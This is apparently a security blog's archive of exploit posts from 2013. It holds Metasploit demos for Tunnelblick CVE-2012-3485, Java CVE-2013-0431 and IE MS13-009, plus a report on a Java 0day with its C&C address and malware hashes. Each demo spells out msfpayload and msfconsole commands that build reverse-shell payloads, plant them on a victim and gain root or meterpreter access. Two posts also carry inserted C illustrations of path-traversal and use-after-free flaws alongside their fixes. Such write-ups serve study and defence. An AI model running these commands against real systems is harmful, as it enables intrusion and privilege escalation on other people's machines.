Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2012-3485 Setuid Tunnelblick Privilege Escalation Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Jason A. Donenfeld on 2012-08-11
Metasploit PoC provided on 2013-03-03

PoC provided by :

Jason A. Donenfeld
juan vazquez

Reference(s) :

CVE-2012-3485

Affected version(s) :

Tunnelblick 3.2.8 and previous

Tested on Mac OS X 10.7.5 x64 with :

Tunnelblick 3.2.8

Description :

This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The vulnerability lies in the setuid openvpnstart helper, where insufficient validation of path names allows execution of arbitrary shell scripts as root. This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099 on Mac OS X 10.7.5.
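The bug class behind this module is a setuid helper that decides whether a user-supplied path is "trusted" by looking at the raw string. The following is an added illustration of that mistake next to a hardened check; it is not openvpnstart's code, and the trusted directory /opt/vpn/configs/ is a hypothetical stand-in. The naive prefix test accepts "/opt/vpn/configs/../../../tmp/evil.sh", so a root-running helper would happily execute a script the attacker placed in /tmp; the hardened version canonicalizes first, and the filesystem-aware variant additionally resolves symlinks and requires the target to be root-owned and not writable by others.

```c
/* Added example: trusted-path check in a setuid helper, naive vs. hardened.
 * Illustrative only; not Tunnelblick's openvpnstart. TRUSTED_PREFIX is a
 * hypothetical directory chosen for the demonstration. */
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

#define TRUSTED_PREFIX "/opt/vpn/configs/"   /* hypothetical trusted directory */

/* Naive check: prefix comparison on the raw string. A path such as
 * "/opt/vpn/configs/../../../tmp/evil.sh" passes, so a setuid binary relying
 * on this would run attacker-controlled files as root. */
int naive_is_trusted(const char *path)
{
    return strncmp(path, TRUSTED_PREFIX, strlen(TRUSTED_PREFIX)) == 0;
}

/* Lexically canonicalize an absolute path: collapse repeated '/', drop ".",
 * resolve "..". Returns 0 on success; -1 if the path is relative, ".." would
 * climb above "/", or the output buffer is too small. The output has no
 * trailing '/' except for "/" itself. */
int canonicalize(const char *path, char *out, size_t outlen)
{
    if (path[0] != '/' || outlen < 2)
        return -1;
    out[0] = '/';
    out[1] = '\0';
    size_t len = 1;
    const char *p = path;
    while (*p) {
        while (*p == '/')
            p++;
        if (!*p)
            break;
        const char *seg = p;
        while (*p && *p != '/')
            p++;
        size_t seglen = (size_t)(p - seg);
        if (seglen == 1 && seg[0] == '.')
            continue;
        if (seglen == 2 && seg[0] == '.' && seg[1] == '.') {
            if (len == 1)
                return -1;               /* refuse rather than silently clamp */
            while (len > 1 && out[len - 1] != '/')
                len--;                   /* strip the last component */
            if (len > 1)
                len--;                   /* and the '/' before it */
            out[len] = '\0';
            continue;
        }
        size_t need = len + (len > 1 ? 1 : 0) + seglen + 1;
        if (need > outlen)
            return -1;
        if (len > 1)
            out[len++] = '/';
        memcpy(out + len, seg, seglen);
        len += seglen;
        out[len] = '\0';
    }
    return 0;
}

/* Hardened check: canonicalize first, then compare the prefix. */
int hardened_is_trusted(const char *path)
{
    char canon[4096];
    if (canonicalize(path, canon, sizeof canon) != 0)
        return 0;
    return strncmp(canon, TRUSTED_PREFIX, strlen(TRUSTED_PREFIX)) == 0;
}

/* Filesystem-aware variant for real use in a setuid helper: realpath(3) also
 * follows symlinks, and the resolved file must be root-owned and not group/world
 * writable, otherwise an unprivileged user can still swap its contents. */
int hardened_is_trusted_fs(const char *path)
{
    char *real = realpath(path, NULL);
    if (real == NULL)
        return 0;
    int ok = strncmp(real, TRUSTED_PREFIX, strlen(TRUSTED_PREFIX)) == 0;
    struct stat st;
    if (ok && (stat(real, &st) != 0 || st.st_uid != 0 ||
               (st.st_mode & (S_IWGRP | S_IWOTH)) != 0))
        ok = 0;
    free(real);
    return ok;
}

/* Small helper used by the checks: does canonicalize(in) yield expected? */
int canon_equals(const char *in, const char *expected)
{
    char buf[4096];
    return canonicalize(in, buf, sizeof buf) == 0 && strcmp(buf, expected) == 0;
}

int main(void)
{
    const char *evil = "/opt/vpn/configs/../../../tmp/evil.sh";
    printf("naive    : %d\n", naive_is_trusted(evil));     /* 1: accepted */
    printf("hardened : %d\n", hardened_is_trusted(evil));  /* 0: rejected */
    return 0;
}
```

The lexical canonicalization is enough to show the traversal problem; in a real setuid helper use the realpath(3) variant, because a symlink inside the trusted directory pointing at /tmp defeats any string-only check, and check ownership and mode of the resolved file as well.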

Commands :

Create an OS X x86 payload with msfpayload
msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > osx-payload

Upload this payload on the victim OS X 10.7.5

use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set LHOST 192.168.178.26
exploit -j

Execute osx-payload; a session will be created.
This session runs with the current user's privileges.

use exploit/osx/local/setuid_tunnelblick
set SESSION 1
set PAYLOAD osx/x86/shell_reverse_tcp
set LPORT 4445
set LHOST 192.168.178.26
exploit

id

CVE-2013-1493 aka Yet Another Oracle Java 0day

Less than 15 days after the release of the Oracle Java CPU special update of 19 February, another Java 0day is reported as exploited in the wild!

FireEye has reported, in a blog post, the discovery of a new Oracle Java 0day targeting the latest versions, Java SE 6 Update 41 and Java SE 7 Update 15.

After successful exploitation of the newly discovered vulnerability, CVE-2013-1493, an “svchost.jpg” file (b6c8ede9e2153f2a1e650dfa05b59b99) is loaded from the same server hosting the Java 0day. Then the McRAT (aka Trojan.Naid) malware (4d519bf53a8217adc4c15d15f0815993) is dropped. Given the detection ratio of this malware (21/46), it seems likely that the Java 0day could end up in exploit packs.

Symantec has reported connections between the new Oracle Java 0day and the Bit9 security incident. In the current Java 0day incident, the “appmgmt.dll” file dropped by “svchost.jpg” is detected by Symantec as Trojan.Naid. The Trojan.Naid sample connects to the 110.173.55.187 C&C server. In the Bit9 security incident, Trojan.Naid was also present and also connected to the 110.173.55.187 C&C server. Symantec detects this Java 0day as “Trojan.Maljava.B”; according to the associated threat assessment, fewer than 49 computers were infected and fewer than 2 websites were used in the watering hole attack.

Security researchers are currently studying the sample; it is a matter of days before this 0day is widely exploited.

We advise you to disable the Java plug-in as soon as possible.

Update 2013-03-07:

Samples are appearing on VirusTotal, such as “svchost.jar” (a721ca9b2ea1c362bd704b57d4d5a280), with a current detection ratio of 17/46.

CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Security Explorations on 2013-01-18
Vulnerability patched by the vendor on 2013-02-01
Vulnerability found exploited in the wild by kafeine and EKwatcher on 2013-02-18
Metasploit PoC provided on 2013-02-25

PoC provided by :

Unknown
Adam Gowdiak
SecurityObscurity
juan vazquez

Reference(s) :

CVE-2013-0431
OSVDB-89613
BID-57726
Malware don’t need Coffee
Security Explorations
Security Obscurity

Affected version(s) :

Java SE 7U11 and previous

Tested on Windows 7 Ultimate SP1 with :

Java SE 7U11

Description :

This module abuses the JMX classes from a Java applet to run arbitrary Java code outside the sandbox, as exploited in the wild in February 2013. Additionally, this module bypasses the default security settings introduced in Java 7 Update 10 to run an unsigned applet without displaying any warning to the user.

Commands :

use exploit/multi/browser/java_jre17_jmxbean_2
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

MS13-009 Microsoft Internet Explorer SLayoutRun UAF Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Scott Bell
Coordinated public release of the vulnerability on 2013-02-12
Metasploit PoC provided on 2013-02-21

PoC provided by :

Scott Bell

Reference(s) :

CVE-2013-0025
OSVDB-90122
BID-57830
MS13-009

Affected version(s) :

Internet Explorer 8

Tested on Windows XP Pro SP3 with :

Internet Explorer 8

Description :

This module exploits a use-after-free vulnerability in Microsoft Internet Explorer where a CParaElement node is released but a reference to it is still kept in CDoc. This memory is reused when a CDoc relayout is performed.
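The description above is the classic use-after-free shape: an owner object releases a child but keeps the raw pointer, and a later operation (here the relayout) dereferences it after the chunk has been handed out again. The following is an added toy model of that flow, not IE's CDoc/CParaElement code; the names doc_t/para_t are hypothetical. A tiny LIFO slab allocator makes the reuse deterministic, playing the role that heap grooming plays in a real browser exploit, so the "vtable" call in the relayout ends up in attacker-chosen code. The fixed variant clears the owner's reference at release time, which is the generic remedy for this pattern.

```c
/* Added example: model of a released node whose reference survives in its
 * owner and is dereferenced on relayout (the MS13-009 bug class). Toy code,
 * not Internet Explorer's; doc_t and para_t are hypothetical names. */
#include <stdio.h>
#include <string.h>

#define CHUNK_SIZE 64
#define NCHUNKS 8

/* Deterministic LIFO slab: the next allocation reuses the most recently freed
 * chunk, which is the property an attacker engineers with heap grooming. */
static unsigned char slab[NCHUNKS][CHUNK_SIZE];
static void *freelist[NCHUNKS];
static int nfree;

void slab_init(void)
{
    nfree = 0;
    for (int i = NCHUNKS - 1; i >= 0; i--)
        freelist[nfree++] = slab[i];
}
void *slab_alloc(void) { return nfree > 0 ? freelist[--nfree] : NULL; }
void  slab_free(void *p) { freelist[nfree++] = p; }

/* Toy "element": a vtable-like function pointer plus layout data. */
typedef struct para {
    long (*measure)(struct para *);
    long height;
} para_t;

static long para_measure(para_t *p) { return p->height; }

typedef struct doc {
    para_t *para;            /* owner keeps a raw pointer to the child */
} doc_t;

para_t *para_create(long height)
{
    para_t *p = slab_alloc();
    p->measure = para_measure;
    p->height = height;
    return p;
}

/* Vulnerable: the node is released but doc->para still points at the chunk. */
void doc_release_para_vuln(doc_t *d) { slab_free(d->para); }

/* Fixed: clear the owner's reference in the same step that releases the node. */
void doc_release_para_fixed(doc_t *d) { slab_free(d->para); d->para = NULL; }

/* Relayout: dereferences the child if present. Returns -1 when there is no
 * child. In the vulnerable flow the chunk now holds attacker data, so the
 * "vtable" call goes wherever the attacker pointed it. */
long doc_relayout(doc_t *d)
{
    if (d->para == NULL)
        return -1;
    return d->para->measure(d->para);
}

/* Attacker-controlled object that lands in the freed chunk. attacker_measure
 * stands in for the code a fake vtable would redirect to. */
static long attacker_measure(para_t *p) { (void)p; return 0x41414141L; }

void *attacker_spray(void)
{
    para_t *fake = slab_alloc();     /* LIFO slab hands back the freed chunk */
    fake->measure = attacker_measure;
    fake->height = 0;
    return fake;
}

/* 1 if the relayout in the vulnerable flow ran the attacker's function. */
int vulnerable_flow_hijacked(void)
{
    slab_init();
    doc_t d = { para_create(12) };
    para_t *dangling = d.para;
    doc_release_para_vuln(&d);
    void *sprayed = attacker_spray();
    return sprayed == (void *)dangling && doc_relayout(&d) == 0x41414141L;
}

/* 1 if the fixed flow ignores the freed node even after the spray. */
int fixed_flow_safe(void)
{
    slab_init();
    doc_t d = { para_create(12) };
    doc_release_para_fixed(&d);
    attacker_spray();
    return doc_relayout(&d) == -1;
}

int main(void)
{
    printf("vulnerable flow hijacked: %d\n", vulnerable_flow_hijacked());
    printf("fixed flow safe         : %d\n", fixed_flow_safe());
    return 0;
}
```

Because the chunks live in a static array, the dangling dereference here is deterministic rather than undefined behaviour, which is what makes the model useful for reasoning: the exploit works exactly when the freed chunk is reallocated with attacker-controlled contents before the stale reference is used, and the fix removes the stale reference rather than trying to control the allocator.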

Commands :

use exploit/windows/browser/ms13_009_ie_slayoutrun_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo